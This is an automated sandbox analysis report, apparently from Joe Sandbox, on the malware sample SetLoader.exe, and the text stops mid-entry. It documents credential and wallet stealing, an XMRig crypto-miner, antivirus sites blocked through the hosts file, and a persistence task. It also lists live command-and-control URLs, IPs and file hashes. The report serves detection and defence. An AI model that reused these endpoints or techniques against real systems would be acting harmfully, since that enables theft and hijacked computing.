Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Local System (11); Credential API Hooking (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID 1498675; sample SetLoader.exe; start date 25/08/2024; architecture WINDOWS; score 100). The graph image is not reproduced; the nodes and edges it encoded are:

• Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Multi AV Scanner detection for submitted file; 7 other signatures
• DNS: xmr-eu1.nanopool.org (DNS related to crypt mining pools); animoanimalestop.fun
• SetLoader.exe (started): drops C:\Users\user\AppData\Local\Temp\...\w1.exe (PE32+); signature: Drops large PE files; starts w2.exe, w3.exe and w1.exe
• w2.exe: drops C:\ProgramData\PcHealthTool\HealthTool.exe (PE32+) and C:\Windows\System32\drivers\etc\hosts (ASCII); signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Uses powercfg.exe to modify the power settings; Drops large PE files; 3 other signatures; starts powershell.exe (Loading BitLocker PowerShell Module; starts conhost.exe), cmd.exe (starts conhost.exe and wusa.exe), cmd.exe (starts conhost.exe and choice.exe) and 13 other processes (which start three conhost.exe instances and 10 other processes)
• w3.exe: drops C:\Users\user\AppData\...\WmiPrvSE.exe (PE32+); signature: Found direct / indirect Syscall (likely to bypass EDR)
• w1.exe: connects to animoanimalestop.fun (172.67.195.146, port 443, local ports 49736 and 49737, CLOUDFLARENETUS, United States); signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal Bitcoin Wallet information
• HealthTool.exe (started): drops C:\Windows\Temp\kzezoxxlsgop.sys (PE32+); signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Protects its processes via BreakOnTermination flag; Found strings related to Crypto-Mining; 5 other signatures; starts powershell.exe (Loading BitLocker PowerShell Module; starts conhost.exe), dwm.exe, cmd.exe (starts conhost.exe and wusa.exe) and 10 other processes (which start conhost.exe and 8 other processes)
• dwm.exe: connects to 146.59.154.106 (port 10343, local port 49745, OVHFR, Norway); signature: Query firmware table information (likely to detect VMs)

Source | Detection | Scanner | Label
SetLoader.exe | 19% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe | 100% | Avira | TR/Crypt.OPACK.Gen

No Antivirus matches

Source | Detection | Scanner | Label
xmr-eu1.nanopool.org | 2% | Virustotal |

Source | Detection | Scanner | Label
https://support.mozilla.org | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
http://digitalbush.com/projects/masked-input-plugin/#license) | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8r | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun:443 | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/m | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/% | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/C | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D | 1% | Virustotal |
http://digitalbush.com/projects/masked-input-plugin/#license) | 0% | Virustotal |
https://animoanimalestop.fun/f | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/G | 0% | Avira URL Cloud | safe
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun:443 | 0% | Virustotal |
https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNH | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/ | 0% | Avira URL Cloud | safe
https://xmrig.com/docs/algorithms | 2% | Virustotal |
https://animoanimalestop.fun/ | 0% | Virustotal |
https://animoanimalestop.fun:4438 | 0% | Avira URL Cloud | safe
https://animoanimalestop.fun/Y | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
animoanimalestop.fun | 172.67.195.146 | true | false | | unknown
xmr-eu1.nanopool.org | 51.15.58.224 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D | false | 1% Virustotal; Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://animoanimalestop.fun/m | w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://digitalbush.com/projects/masked-input-plugin/#license) | w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://animoanimalestop.fun:443 | w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8r | w1.exe, 00000004.00000003.2282018670.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/% | w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/C | w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/f | w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/G | w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/docs/algorithms | HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp | false | 2% Virustotal; Avira URL Cloud: safe | unknown
https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNH | w1.exe, 00000004.00000003.2268209246.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000002.2317476232.0000000007EF0000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000003.2223062248.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000003.2214655196.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org | w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmp; w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://animoanimalestop.fun/ | w1.exe, 00000004.00000003.2276868902.0000000000F2A000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://animoanimalestop.fun:4438 | w1.exe, 00000004.00000003.2277021614.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://animoanimalestop.fun/Y | w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://animoanimalestop.fun/y | w1.exe, 00000004.00000003.2223062248.0000000000F29000.00000004.00000020.00020000.00000000.sdmp; w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.195.146 | animoanimalestop.fun | United States | 13335 | CLOUDFLARENETUS | false
146.59.154.106 | unknown | Norway | 16276 | OVHFR | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1498675
Start date and time: 2024-08-25 15:42:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 69
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SetLoader.exe
Detection: MAL
Classification: mal100.adwa.spyw.evad.mine.winEXE@99/15@2/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target HealthTool.exe, PID 5628 because there are no executed functions
• Execution Graph export aborted for target dwm.exe, PID 6072 because there are no executed functions
• Execution Graph export aborted for target w1.exe, PID 5672 because there are no executed functions
• Execution Graph export aborted for target w3.exe, PID 5328 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:43:52 | API Interceptor | 7x Sleep call for process: w1.exe modified
09:44:19 | API Interceptor | 42x Sleep call for process: powershell.exe modified
14:45:23 | Task Scheduler | Run new task: WmiPrvSES path: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  146.59.154.106SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                    RPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                      2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        xmr-eu1.nanopool.orgekBTbONX85.exeGet hashmaliciousXmrigBrowse
                        • 51.15.58.224
                        yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                        • 212.47.253.124
                        SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                        • 51.15.65.182
                        setup.exeGet hashmaliciousXmrigBrowse
                        • 51.15.58.224
                        Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                        • 162.19.224.121
                        25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                        • 51.15.193.130
                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                        • 54.37.137.114
                        Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                        • 212.47.253.124
                        updater.exeGet hashmaliciousXmrigBrowse
                        • 141.94.23.83
                        SecuriteInfo.com.Win64.RATX-gen.29355.29242.exeGet hashmaliciousAsyncRAT, Nbminer, XmrigBrowse
                        • 54.37.232.103
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | HPSupportSolutionsFramework-13.0.1.131.exe | malicious | LummaC | 172.67.215.62
CLOUDFLARENETUS | 0RmMail.exe | malicious | LummaC | 104.21.16.180
CLOUDFLARENETUS | 0qbittorrent.exe | malicious | LummaC | 104.21.28.66
CLOUDFLARENETUS | continuesurf.b-cdn.net.ps1 | malicious | LummaC | 104.21.28.66
CLOUDFLARENETUS | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.16.180
CLOUDFLARENETUS | file.exe | malicious | LummaC, Vidar | 188.114.96.3
CLOUDFLARENETUS | 0RmMail.exe | malicious | LummaC | 104.21.16.180
CLOUDFLARENETUS | bot-test.b-cdn.net.ps1 | malicious | LummaC | 104.21.16.180
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 104.21.16.180
CLOUDFLARENETUS | https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.cexz.top%2FTrade%2Ftradelist.html%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR3QXxe8AlutZYqRLhy6kfcRHX7ox79ANtoHkL5MFDvM9u_NxfXkkNAfcbE_aem_UDbPgNljQReqTdyzL1qAnA&h=AT0q7wmRkcJcM0QgxkcKmXpzdiZ2ZUH5T5Kvlz7u1IbzLVp1YAb0xfnp9rD61UTjjRPU9g0CsI9wwbfTxhZZHMiitY__RjpLcm73Ll-O6mHfrnKHdskDQLcrIZpxdHQfGWYjzA | malicious | Unknown | 104.17.24.14
OVHFR | http://designz23.live | malicious | Unknown | 51.89.247.112
OVHFR | http://yathuchandran.github.io/Metamask.clone | malicious | Unknown | 37.187.129.200
OVHFR | https://rogue-orange-foe.glitch.me/public/USANFCU.html | malicious | HTMLPhisher | 164.132.25.184
OVHFR | https://jam-paq.com/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQ | malicious | Unknown | 149.56.200.84
OVHFR | RebelCracked.exe | malicious | Exela Stealer, Python Stealer | 51.38.43.18
OVHFR | https://app.degoo.com/share/9tVyiOLsGMdG31dc7RxXgw | malicious | Unknown | 5.135.209.104
OVHFR | http://ikenn99.store/ | malicious | Unknown | 54.38.113.6
OVHFR | http://www.jetflightsimulatorperth.com.au | malicious | Unknown | 37.187.129.45
OVHFR | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 37.187.158.211
OVHFR | Review_Aonoro.pdf | malicious | Unknown | 51.77.64.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | HPSupportSolutionsFramework-13.0.1.131.exe | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | 0RmMail.exe | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | 0qbittorrent.exe | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | continuesurf.b-cdn.net.ps1 | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Vidar | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | 0RmMail.exe | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | bot-test.b-cdn.net.ps1 | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 172.67.195.146
a0e9f5d64349fb13191bc781f81f42e1 | 3d3koK2Vun.exe | malicious | LummaC | 172.67.195.146
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Windows\Temp\kzezoxxlsgop.sys | file.exe | malicious | Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | 22.08.2024.exe | malicious | Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | 3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC
C:\Windows\Temp\kzezoxxlsgop.sys | ExeFile (375).exe | malicious | Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | file.exe | malicious | Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | j0A1eprdwX.exe | malicious | Unknown
C:\Windows\Temp\kzezoxxlsgop.sys | Q5PewRuhqV.exe | malicious | Unknown
C:\Windows\Temp\kzezoxxlsgop.sys | fkABXcncEA.exe | malicious | RedLine, Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | test2.exe | malicious | Xmrig
C:\Windows\Temp\kzezoxxlsgop.sys | test.exe | malicious | Xmrig
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):831071200
                                            Entropy (8bit):6.635243298149964
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:FCE277E4928FDE19CD8BAD5CE1997792
                                            SHA1:DD439316C22AC10EE33E2E99D6988285113B35E3
                                            SHA-256:601FCAF45432343ACAD269A4F097502C13991BCD4CFE69ADD83F294EBF03A126
                                            SHA-512:B82DD922091882A2C1ACA4F5F997FEBC9866C164DE67DF7D8818B4D982EA5FEAD2509BA74621C3DD5AEE9626D940960114DCD14B264F24937A18ABAEE3714F2D
                                            Malicious:true
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....>.f..........#..........6l................@.......................................... .................................................8 ..P................*..........................................0...(...`...8............P...............................text...V........................... ..`.rdata..D+...0......................@..@.data.....l..`......................@....pdata........m.....................@..@.00cfg........m.....................@..@.tls..........m.....................@....2}k....k.....m..................... ..`.Zj[....H....P......................@....&T7......i..`....i.................`..h................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul3nqth:NllUa
                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                            Malicious:false
                                            Preview:@...e.................................&..............@..........
                                            Process:C:\Users\user\Desktop\SetLoader.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):834649568
                                            Entropy (8bit):6.643347095555907
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:739213A2496D01E16DDC02B6898A81AD
                                            SHA1:D5DF030C567433CB17E00D24078665CE83BAF05D
                                            SHA-256:E3CC6A72B3259A15ABAB008AE056E8B91BEE5F02EAD801916EED2BDF47EEA2B9
                                            SHA-512:562D920796A4D358B7F2F9BA9DC404B457D94C1B352BC16A6795A7F6F77A95011F518771E266F745AAA69EDF9444F2D72C63C168881674E38C0EAA8D9A809740
                                            Malicious:true
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...O9.f..........".......]...B.....`.].......@......................................................@............... ...............`g......pf..P...0q..R0..@l.0.............g...............................g.(....................f.......f.F....................text.....].......]................. ..`.data.........].......].............@....bss....,.....e..........................idata...P...pf..R...ze.............@....didata.F.....f.......e.............@....edata.......`g......\f.............@..@.tls.........pg..........................rdata..m.....g......^f.............@..@.reloc........g......`f.............@..B.pdata..0....@l.......k.............@..@.rsrc....R0..0q..R0...o.............@..@.....................N..............@..@
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe
                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):827374560
                                            Entropy (8bit):6.610717486288164
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:286405D179DCBBC1ACB0B5957B45CDF7
                                            SHA1:2AC9DB419105F0FC8F3B2AFDA1EE58808BF1A8F7
                                            SHA-256:080A2EAC876384F97C5E49A6EB25E080126DF68B8514D5232E34D84122E232CE
                                            SHA-512:494DEBFAD957560496CEEF381254B5B100318C6856B3D93CDEE77FE3224D08A924C94FB0D0C47F5603676E0B4B2FA0DC54BB10601CDB1AE5BD5B634482F52661
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........#....(.....|......2.'........@.............................pP.......2... ..................................................u*.P....`P.......P..R..................................................@.P.@............................................text.............................. ..`.rdata..............................@..@.data....4..........................@....pdata..@)..........................@..@.oU[......... ...................... ..`.G&p.... ...........................@....>n>....$41.. ...61.................`..h.rsrc........`P......F1.............@..@................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulhlL:NllUz
                                            MD5:04A4D910C1EE050C8E96A26F3F539E01
                                            SHA1:70DC4EC8282227775F2E7442755C38E996B628D1
                                            SHA-256:BA5BE56B35B0C07BA8908406F737B94A432D01C906F940DE8E8FF7E64AFF1A91
                                            SHA-512:9E6A907FFF726FDCF056BF2BD7476A68EF9B7ED90FA394A36AD41E37199F9CF3999F37C9C66515034277662DB27FCFD0C089BBACE1A5ACB066143CC4E311A8AC
                                            Malicious:false
                                            Preview:@...e................................................@..........
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):3046
                                            Entropy (8bit):4.232716031350585
                                            Encrypted:false
                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJdASn7XP:vDZEurK9XiCW1RikSn7
                                            MD5:74BA6701F702FD970CB63E394CB42686
                                            SHA1:1793E243BE6364E6D5D7CDEB07CB95CB4A9E092F
                                            SHA-256:11B870F5110978A2E567702B65B4DBB66981D2DA43639F5F6F4FB93D19B52D59
                                            SHA-512:A2A75054B7E0137F4A72940EDB19ED5CB3BABE2EDADCBD0EC0EF8F11CEAAB225E54AA580D064C41B92011D73CEA7A8FA315E2442B0A8FE14F2D548B1B0B58FBA
                                            Malicious:true
                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
